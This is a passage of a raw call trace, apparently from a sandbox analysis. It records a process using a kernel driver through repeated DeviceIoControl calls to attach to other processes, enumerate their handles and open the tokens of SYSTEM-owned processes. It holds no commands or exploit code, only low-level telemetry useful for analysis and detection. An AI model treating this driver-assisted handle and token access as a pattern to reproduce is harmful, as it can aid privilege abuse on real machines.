lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.685] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.685] PsAcquireProcessExitSynchronization () returned 0x0 [0243.685] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.685] ObReferenceObjectByHandle (in: Handle=0x538, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001745540, HandleInformation=0x0) returned 0x0 [0243.685] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.685] PsReleaseProcessExitSynchronization () returned 0x2 [0243.685] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.685] ObQueryNameString (in: Object=0xfffff8a001745540, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.685] ObfDereferenceObject (Object=0xfffff8a001745540) returned 0x1 [0243.686] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.686] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.686] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.686] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0243.686] PsLookupProcessByProcessId (in: ProcessId=0x148, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.686] PsAcquireProcessExitSynchronization () returned 0x0 [0243.686] KeStackAttachProcess (in: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003533060, ApcState=0xfffff880053c85d0) [0243.686] ObReferenceObjectByHandle (in: Handle=0x540, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001789ce0, HandleInformation=0x0) returned 0x0 [0243.686] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.686] PsReleaseProcessExitSynchronization () returned 0x2 [0243.686] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7c [0243.686] ObQueryNameString (in: Object=0xfffff8a001789ce0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.686] ObfDereferenceObject (Object=0xfffff8a001789ce0) returned 0x1 [0243.686] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.686] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0xc8 [0243.686] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0243.686] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80018b85a0, HandleInformation=0x0) returned 0x0 [0243.686] ObOpenObjectByPointer (in: Object=0xfffffa80018b85a0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0243.686] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x71 [0243.686] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa80025381c0 | out: TokenHandle=0xfffffa80025381c0*=0xc4) returned 0x0 [0243.686] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0243.687] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.687] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0243.687] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0243.689] CloseHandle (hObject=0xc4) returned 1 [0243.689] CloseHandle (hObject=0xc8) returned 1 [0243.689] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.689] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0243.689] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.689] PsAcquireProcessExitSynchronization () returned 0x0 [0243.689] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0) [0243.689] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003554cb0, HandleInformation=0x0) returned 0x0 [0243.689] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.689] PsReleaseProcessExitSynchronization () returned 0x2 [0243.689] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0243.689] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8508) returned 0x0 [0243.689] ObfDereferenceObject (Object=0xfffffa8003554cb0) returned 0x1 [0243.689] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.689] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.689] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.689] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0243.689] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.690] PsAcquireProcessExitSynchronization () returned 0x0 [0243.690] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0) [0243.690] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800294d590, HandleInformation=0x0) returned 0x0 [0243.690] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.690] PsReleaseProcessExitSynchronization () returned 0x2 [0243.690] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0243.690] ObQueryNameString (in: Object=0xfffffa800294d590, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.690] ObfDereferenceObject (Object=0xfffffa800294d590) returned 0x1 [0243.690] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.690] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.690] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.690] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0243.690] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.690] PsAcquireProcessExitSynchronization () returned 0x0 [0243.690] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0) [0243.690] ObReferenceObjectByHandle (in: Handle=0xcc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003589f20, HandleInformation=0x0) returned 0x0 [0243.690] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.690] PsReleaseProcessExitSynchronization () returned 0x2 [0243.690] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0243.690] ObQueryNameString (in: Object=0xfffffa8003589f20, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.690] ObfDereferenceObject (Object=0xfffffa8003589f20) returned 0x2 [0243.690] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.691] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.691] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.691] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x46, lpOverlapped=0x0) returned 1 [0243.691] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.691] PsAcquireProcessExitSynchronization () returned 0x0 [0243.691] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0) [0243.691] ObReferenceObjectByHandle (in: Handle=0xd0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003589070, HandleInformation=0x0) returned 0x0 [0243.691] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.691] PsReleaseProcessExitSynchronization () returned 0x2 [0243.691] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0243.691] ObQueryNameString (in: Object=0xfffffa8003589070, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.691] ObfDereferenceObject (Object=0xfffffa8003589070) returned 0x1 [0243.691] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.691] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.691] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.691] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0243.691] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.691] PsAcquireProcessExitSynchronization () returned 0x0 [0243.691] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0) [0243.691] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036fb8d0, HandleInformation=0x0) returned 0x0 [0243.691] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.691] PsReleaseProcessExitSynchronization () returned 0x2 [0243.691] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0243.691] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8508) returned 0x0 [0243.692] ObfDereferenceObject (Object=0xfffffa80036fb8d0) returned 0x1 [0243.692] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.692] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.692] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.692] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0243.692] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.692] PsAcquireProcessExitSynchronization () returned 0x0 [0243.692] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0) [0243.692] ObReferenceObjectByHandle (in: Handle=0x12c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003756a20, HandleInformation=0x0) returned 0x0 [0243.692] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.692] PsReleaseProcessExitSynchronization () returned 0x2 [0243.692] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0243.692] ObQueryNameString (in: Object=0xfffffa8003756a20, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.692] ObfDereferenceObject (Object=0xfffffa8003756a20) returned 0x2 [0243.692] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.692] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.692] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.692] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0243.692] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.692] PsAcquireProcessExitSynchronization () returned 0x0 [0243.692] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0) [0243.693] ObReferenceObjectByHandle (in: Handle=0x130, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003766a50, HandleInformation=0x0) returned 0x0 [0243.693] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.693] PsReleaseProcessExitSynchronization () returned 0x2 [0243.693] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0243.693] ObQueryNameString (in: Object=0xfffffa8003766a50, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.693] ObfDereferenceObject (Object=0xfffffa8003766a50) returned 0x2 [0243.693] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.693] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.693] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.693] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0243.693] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.693] PsAcquireProcessExitSynchronization () returned 0x0 [0243.693] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0) [0243.693] ObReferenceObjectByHandle (in: Handle=0x134, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003767ba0, HandleInformation=0x0) returned 0x0 [0243.693] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.693] PsReleaseProcessExitSynchronization () returned 0x2 [0243.693] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0243.693] ObQueryNameString (in: Object=0xfffffa8003767ba0, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.693] ObfDereferenceObject (Object=0xfffffa8003767ba0) returned 0x2 [0243.693] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.693] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.693] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.694] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0243.694] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.694] PsAcquireProcessExitSynchronization () returned 0x0 [0243.694] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0) [0243.694] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003760f20, HandleInformation=0x0) returned 0x0 [0243.694] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.694] PsReleaseProcessExitSynchronization () returned 0x2 [0243.694] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0243.694] ObQueryNameString (in: Object=0xfffffa8003760f20, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.694] ObfDereferenceObject (Object=0xfffffa8003760f20) returned 0x2 [0243.694] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.694] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.694] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0243.694] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0243.694] PsLookupProcessByProcessId (in: ProcessId=0x178, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.694] PsAcquireProcessExitSynchronization () returned 0x0 [0243.694] KeStackAttachProcess (in: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b85a0, ApcState=0xfffff880053c85d0) [0243.694] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003769e20, HandleInformation=0x0) returned 0x0 [0243.694] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.694] PsReleaseProcessExitSynchronization () returned 0x2 [0243.694] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x6f [0243.694] ObQueryNameString (in: Object=0xfffffa8003769e20, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0243.694] ObfDereferenceObject (Object=0xfffffa8003769e20) returned 0x2 [0243.695] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.695] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0243.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0xc8 [0243.695] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0243.695] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80018b95d0, HandleInformation=0x0) returned 0x0 [0243.695] ObOpenObjectByPointer (in: Object=0xfffffa80018b95d0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0243.695] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x16b [0243.695] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa80025381c0 | out: TokenHandle=0xfffffa80025381c0*=0xc4) returned 0x0 [0243.695] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0243.695] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0243.695] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0243.695] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0243.914] CloseHandle (hObject=0xc4) returned 1 [0243.914] CloseHandle (hObject=0xc8) returned 1 [0243.914] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea15e0 [0243.914] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea15e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea15e0*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0243.914] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0243.914] PsAcquireProcessExitSynchronization () returned 0x0 [0243.914] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880053c85d0) [0243.914] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003558f20, HandleInformation=0x0) returned 0x0 [0243.915] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0243.915] PsReleaseProcessExitSynchronization () returned 0x2 [0243.915] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x167 [0243.915] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0243.915] ObfDereferenceObject (Object=0xfffffa8003558f20) returned 0x1 [0243.915] IofCompleteRequest (Irp=0xfffffa80019e2540, 